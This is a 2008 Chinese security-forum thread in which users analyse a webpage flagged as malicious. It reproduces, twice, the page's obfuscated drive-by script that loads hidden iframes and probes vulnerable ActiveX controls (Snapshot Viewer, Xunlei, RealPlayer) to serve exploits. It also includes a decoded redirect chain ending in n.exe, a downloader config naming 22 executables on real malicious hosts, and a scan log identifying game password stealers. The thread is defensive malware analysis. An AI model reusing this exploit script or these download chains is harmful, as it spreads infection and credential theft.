微点在此网页报毒

显示全部楼层 · 发表于 2008-11-17 20:30:39

n.exe - 可能是 Win32/TrojanDownloader.Flux 特洛伊木马的变种

显示全部楼层 · 发表于 2008-11-17 20:39:32

document.write("<iframe width=0 height=0 src=http://net.fql12.cn/flash01.htm></iframe>"); window.status="完成"; window.onerror=function(){return true;} if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1) document.write("<iframe width=0 height=0 src=http://net.fql12.cn/614.htm></iframe>"); try{var n; var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");} catch(n){}; finally{if(n!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/ff.htm></iframe>");}} try{var w; var ml=new ActiveXObject("D"+"PC"+"lie"+"nt.Vod");} catch(w){}; finally{if(w!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/xunlei.htm></iframe>");}} try{var g; var gl=new ActiveXObject("GLIEDow"+"n.IEDown.1");} catch(g){}; finally{if(g!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/mi.htm></iframe>");}} function test() { rrooxx = "I" + "E" + "R" + "P" + "C" + "t" + "l" + ".I" + "E" + "R" + "P" + "C" + "t" + "l." + "1"; try { Like = new ActiveXObject(rrooxx); }catch(error){return;} vvvvv = Like.PlayerProperty("PRODUCTVERSION"); if(vvvvv<="6.0.14.552") document.write("<iframe width=0 height=0 src=http://net.fql12.cn/real10.htm></iframe>"); else document.write("<iframe width=0 height=0 src=http://net.fql12.cn/real11.htm></iframe>"); } test();

话说这个加密解密有点点难...我这个浏览器也不争气...解这个东西居然解死机了...
关于:hxxp://www.xywai.cn/Topic.aspx?BoardID=7&TopicID=986解密的日志(全体输出-  16):
Level 1>http://net.fql12.cn/flash01.htm
Level 2>http://net.fql12.cn/f22.html
Level 3>http://net.fql12.cn/swfobject.js
Level 2>http://net.fql12.cn/f11.html
Level 1>http://net.fql12.cn/614.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/ff.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/xunlei.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/mi.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/real10.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/real11.htm
Level 2>http://net.fql11.cn/n.exe  ●
这个新版似乎不错...

[ 本帖最后由 aarwwefdds 于 2008-11-17 20:51 编辑 ]

显示全部楼层 · 发表于 2008-11-17 20:46:03

http://nx.yal99.cn/soft//update.txt

[update] ver=2008111403 url=http://nx.yal99.cn/soft/soft/acab7e5515e97a02.exe updatetimer=120 [startpage] startpage=0 url=ssssssssssssssssssss [desktop] desktop=0 title1=ww url1=http:// count=1 [file] file=1 file1=http://ad3.fql13.cn/mh.exe filename1=ffsea1.exe ftime1=3 file2=http://ad3.fql13.cn/wd.exe filename2=ffsea2.exe ftime2=3 file3=http://ad3.fql13.cn/zt.exe filename3=ffsea3.exe ftime3=3 file4=http://ad3.fql13.cn/my.exe filename4=ffsea4.exe ftime4=3 file5=http://ad3.fql13.cn/dxc.exe filename5=ffsea5.exe ftime5=3 file6=http://ad3.fql13.cn/wm.exe filename6=ffsea6.exe ftime6=3 file7=http://ad.fql13.cn/jx.exe filename7=ffsea7.exe ftime7=3 file8=http://ad3.fql13.cn/tl.exe filename8=ffsea8.exe ftime8=3 file9=http://ad3.fql13.cn/qqhx.exe filename9=ffsea9.exe ftime9=3 file10=http://ad.fql13.cn/zx.exe filename10=ffsea10.exe ftime10=3 file11=http://ad3.fql13.cn/wow.exe filename11=ffsea11.exe ftime11=4 file12=http://ad3.fql13.cn/xx.exe filename12=ffsea12.exe ftime12=4 file13=http://ad3.fql13.cn/kdxy.exe filename13=ffsea13.exe ftime13=4 file14=http://ad3.fql13.cn/cqwz.exe filename14=ffsea14.exe ftime14=4 file15=http://ad3.fql13.cn/dj.exe filename15=ffsea15.exe ftime15=4 file16=http://ad3.fql13.cn/cb.exe filename16=ffsea16.exe ftime16=4 file17=http://ad3.fql13.cn/cs.exe filename17=ffsea17.exe ftime17=4 file18=http://ad3.fql13.cn/dh.exe filename18=ffsea18.exe ftime18=4 file19=http://ad.fql13.cn/qqsg.exe filename19=ffsea19.exe ftime19=4 file20=http://ad.fql13.cn/jh.exe filename20=ffsea20.exe ftime20=4 file21=http://ad3.fql13.cn/wl.exe filename21=ffsea21.exe ftime21=4 file22=http://ad3.fql13.cn/cq.exe filename22=ffsea22.exe ftime22=4 count=22 [count] count=0 mecount=0 url=http://nx.yal99.cn/soft/count/count.asp

复制代码

显示全部楼层 · 发表于 2008-11-17 20:59:21

正在扫描日志
病毒库版本: 3617 (20081117)
日期: 2008-11-17 时间: 21:01:08
已扫描的磁盘、文件夹和文件: K:\23.rar
K:\23.rar > RAR > acab7e5515e97a02.exe - 可能是 Win32/TrojanDownloader.Flux 特洛伊木马的变种
K:\23.rar > RAR > cb.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马的变种
K:\23.rar > RAR > cq.exe - 未查明的 NewHeur_PE 病毒 [7]
K:\23.rar > RAR > cqwz.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马的变种
K:\23.rar > RAR > cs.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马的变种
K:\23.rar > RAR > dh.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马的变种
K:\23.rar > RAR > dj.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马的变种
K:\23.rar > RAR > dxc.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马的变种
K:\23.rar > RAR > jh.exe - 可能是 Win32/PSW.OnLineGames.NXI 特洛伊木马的变种
K:\23.rar > RAR > jx.exe - Win32/PSW.OnLineGames.NRF 特洛伊木马的变种
K:\23.rar > RAR > kdxy.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马的变种
K:\23.rar > RAR > mh.exe - Win32/PSW.OnLineGames.NRF 特洛伊木马的变种
K:\23.rar > RAR > my.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马的变种
K:\23.rar > RAR > qqhx.exe - 可能是 Win32/PSW.OnLineGames.NXI 特洛伊木马的变种
K:\23.rar > RAR > qqsg.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马的变种
K:\23.rar > RAR > tl.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马的变种
K:\23.rar > RAR > wd.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马的变种
K:\23.rar > RAR > wl.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马的变种
K:\23.rar > RAR > wm.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马的变种
K:\23.rar > RAR > wow.exe - 可能是 Win32/PSW.OnLineGames.MUG 特洛伊木马的变种
K:\23.rar > RAR > xx.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马的变种
K:\23.rar > RAR > zt.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马的变种
K:\23.rar > RAR > zx.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马的变种
已扫描的对象数: 23
发现的威胁数: 23
已清除对象数:0
完成时间: 21:01:19 总扫描时间: 11 秒 (00:00:11)
备注:
[7] 对象可能感染了未知病毒。

没讯雷的情况下打包真累

23.rar (330.25 KB, 下载次数: 37)

显示全部楼层 · 发表于 2008-11-17 21:21:44

FF浏览器打开，伞没反应

显示全部楼层 · 发表于 2008-11-17 22:43:08

<SCRIPT>
document.write("<iframe width=0 height=0 src=http://net.fql12.cn/flash01.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1)
document.write("<iframe width=0 height=0 src=http://net.fql12.cn/614.htm></iframe>");
try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};
finally{if(n!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/ff.htm></iframe>");}}
try{var w;
var ml=new ActiveXObject("D"+"PC"+"lie"+"nt.Vod");}
catch(w){};
finally{if(w!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/xunlei.htm></iframe>");}}
try{var g;
var gl=new ActiveXObject("GLIEDow"+"n.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/mi.htm></iframe>");}}
function test()
{
rrooxx = "I" + "E" + "R" + "P" + "C" + "t" + "l" + ".I" + "E" + "R" + "P" + "C" + "t" + "l." + "1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=0 height=0 src=http://net.fql12.cn/real10.htm></iframe>");
else
document.write("<iframe width=0 height=0 src=http://net.fql12.cn/real11.htm></iframe>");
}
test();
</SCRIPT>
</HEAD>
</HTML>

样本就是8楼发的那个。

显示全部楼层 · 发表于 2008-11-17 22:46:54

囧了，我也用过这个，可没解出来，是不是需要设置什么？

显示全部楼层 · 发表于 2008-11-17 22:52:05

2008/11/17 22:50:57 已删除木马程序 Trojan.Win32.AntiAV.st G:\Temp\Virus\n.exe//ASPack

显示全部楼层 · 发表于 2008-11-17 22:56:34

100%的挂马了

微点报警了！

显示全部楼层 · 发表于 2008-11-18 00:14:27

反正我已经去，，微点还没来得及报，，，node32就报了

[已鉴定] 微点在此网页报毒

那个文件实在找不到

回复 12楼 aarwwefdds 的帖子